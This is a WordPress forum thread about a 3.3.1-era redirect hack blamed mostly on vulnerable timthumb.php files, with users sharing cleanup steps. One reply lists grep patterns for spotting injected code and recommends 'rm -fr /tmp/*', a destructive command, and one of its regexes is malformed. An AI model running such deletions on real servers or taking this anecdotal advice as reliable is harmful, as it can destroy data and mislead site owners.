3.3.1 Hacked by saveprefs.ru redirect

with
sudo grep -r turnitupnow * > badfiles.txt

I found A LOT more of this!

One additional step to add to @wpv-expert’s post:

Be sure to check your development system for malware. One of the easiest entry points for this is a compromised Windows system. Key loggers and other similar malware allow the hacker to steal your FTP password.

Never use a Windows PC for both casual surfing using IE and FTP to production sites. It’s better to have an intermediary machine running Linux that you save your code to, test it and then upload it to the production server.

/peter

Looks like my problem was caused by another domain on the same server, that got hacked. Simply chmodding my root folder did the trick…

It’s always the hardest when a simple solution is right in front of you…

Another one hacked with the same bad thing here ?? 5 WordPress installations on one shared hosting account (iPage).
2 days since I’m looking for solution to this nasty hack.
After reading many posts in various places and trying to find a solution finally I think I managed to stop the .htaccess rewrite thing to happen every half an hour or so. This is what I did:

1. The first thing I did was to download all my files from the server in a backup dir on my pc and to make database backups of the 5 WordPress installations on my server. There were 30000+ files, but it was worth the downloading.

2. Next I ran a file search on my backup dir for the “_cache.php” file mentioned in many posts I read. It was found in only one WordPress installation in “/wp-content/uploads”. I deleted it from the server.
p.s. First I was using a basic FTP connection, but now I switched my settings to SFTP. I changed my password before that with a really strong one ?? as it was mentioned that this attacks may be so successful due to weak FTP passwords.

3. The next thing I did was to file search the backup dir for all “timthumb.php” instances. There were many in themes also in plugins (ubermenu, featured posts with thumbnails etc…).

4. I deleted all unused themes and plugins and all instances of “timthumb.php”.

5. Reinstalled all 5 WordPress installations with fresh ones with the auto reinstall fron the admin update menu.

6. Deleted all “.htaccess” files from the five sites and replace them with fresh ones and chmod them to 444 (as “Tehranshahr” suggested here). I also included the 404 redirect code the user “impact” posted earlier here.

Now it’s been more than an hour and a half and the “.htaccess” rewrite thing seems to be stopped. I’m praying that this is it for now.

bizarotrips, which version of wordpress are you using? which plugins do you have installed?

I work as a malware analyst and most WordPress hacks that I have seen are due to vulnerabilities within third-party plugins.

One particular instance the user had installed a plugin (latest version), but it hadn’t been updated by the developer in months even after the vulnerability had been posted all over the net. ??

Go over what you have installed, and search the net to determing if there are any exploits published for the plugins that you use.

Also check out Better WP. It works pretty good, when it comes to utilizing best practices in regards to WP security.

This was just brought to my attention…

If you are at your whits end trying to get your site back on track, these guys will do it for like 100 bucks or something like that.

malfarmed.com

UPDATE: My sites are up an running Ok without any redirection in the “.htaccess” files since my last post. I’m almost sure that in my case it was the “timthumb.php” exploit used. @j0hnnyb0y all my WP installs are 3.3.1
About the plugins… it’s more complicated thing, because I’ve installed so many plugins on one of my sites for research purposes that it’s very hard for me to find out which one of them may caused this vulnerability. As I posted before I’ve downloaded all the files from my server directory (just 5 WordPress installs – 30000+ files)so I will have the time to check everything that could cause this s**t.
I’m pretty sure that many of my files still contain some unwanted scripts injected so I’m gonna investigate that further.

p.s. the “https://sitecheck.sucuri.net” still gives me a warnings for some of the files in my WP installs… One of them is “init2.php” which was in one of my thumbnail’s directories. This I connect again with the “timthumb.php” thing.

I am now using this WP plugin “TimThumb Vulnerability Scanner” By Peter Butler on any new site or plugin I install. Seems to work ok, not sure it is updating the script properly, but at least it identifies any timthumbs that are out of date and not secure and I can update them manually.

I was hacked too, they created 4 folders: lastnews, newsjournal, curretevents and breakingnews, each one with 100 names, each one with one .htaccess that redirected to a Russian site.

Then send thousands of spam mails linking to that files. The only script I have on that domain is wordpress!

I deleted the folders but they appeared later, so now I leave the folders there but I changed the permission so no one can access them.

But I still worried, my server provider wants to know what happened, and I really dont know.

@roro what’s your domain?

he,
where is the probnlem now, in the timthumb.php or in wp 3.3.1 ??
thanks.

Mr Badr, for me it was timthumb.php, and not 3.3.1. There is a plugin that I suggest you use called “TimThumb Vulnerability Scanner” By Peter Butler. It will scan all your files and tell you if you have a timthumb script that is open to attack.

All the best,
Jamie

This timthumb hack caused havoc about half a year ago. Apparently they found a new vulnerability or all of you didn’t switch to better coded plugins after that havoc.

https://wpcandy.com/reports/timthumb-security-vulnerability-discovered

Badr, the last time there was a largely exploited of WordPress itself has been years back. When you make sure always to have the latest WP, the things to look at for security are plugins, server settings, passwords, etc.

@p-mt, sorry for late response, was busy last week …

sudo grep -r turnitupnow * > badfiles.txt

is good, but…

Do you know that:
1. PHP can be easily embedded in gif, jpg, png, mp3, wav… ?
2. A lot of plugins after unpacking has executable rights on gif, jpg, png, txt files, which can be executed as CGI in this case?
Always cure them with help of

find ./ -type d  -exec chmod -vv 755 {} \;
find ./ -type f  -exec chmod -vv 644 {} \;

3. Bunch of installations has 777 permissions on all wp-content folder instead of restricting it to “upload” only? (The best choice would be to remove ANY writable by HTTP server folders outside DOCUMENT_ROOT as it possible to do with other CMS, but changing it in the WordPress it’s a challenge)
4. Almost any HTTP server allows write permissions to /tmp which is most loveable place for any backdoors?
5. Most servers have bash, gawk… base utilities which can be called by anyone and can be easily used as backdoor channel,(so no need to keep anything on servers cuz it always available ?? ) any trace of activity will be logged on hosting?

Well there is a lot of scary things that out of your control if you dont run your own server. Hackers rarely infect systems in old fashion way. They usually keeps spare ways to reactivate itself after their visible stuff was detected and deleted. Spare ways could be anywhere, in database triggers, inside images or mp3 files(that actually always exposed by WordPress to the world)…etc

To be sure that you care at least your parts of software, check ALL your files that exposed by HTTP server with this simple commands(change directory to the ROOT of HTTP accessible aka DOCUMENT_ROOT):

# Check if some files trying to obfuscate itself
find . | xargs grep -i base64 > ../000-obfuscation.txt

# Check for links to external sites
# Especially pay attention if it is in php files
find . | xargs grep '\<:alpha:*://[^/]*'> ../001-external_links_in_urls.txt

# Review potentially malicious content
find . | xargs grep -Ei 'iframe|src|javascript:|eval|include' > ../002-active_content.txt

# Delete anything in temporary folder that was created by your
# account. (Dont worry that you may delete others files,
# /tmp has a stiky bit set on most servers, so you can not delete
# files that was created by others) 

rm -fr /tmp/* ;

Dump MySQL database so it will be possible to parse it as a single text file and search for the same keywords inside it.

Well, there no universal advises because of different environments on servers and situation heavily depended on what type of plugins/themes do you use(BTW, don’t keep deactivated plugins/themes since it still callable from outside and if one find a hole he/she will able to use it)

Best regards,
Alex

Hi all,

One of our clients has reported the same problem. It was a shared hosting account with multiple WordPress installations. We have cleared all the installations to make sure no ‘back door was opened’.

I have seen here that some users problem persisted despite following all instructions outlined above.

I just wanted to point out that you should not forget to replace the .htaccess file which is located outside the www/public_html root.

You will have a .htaccess file there as well. If it was infected (overwritten), no matter how hard you look for malicious files in your websites the problem will persist.

Also start using SFTP.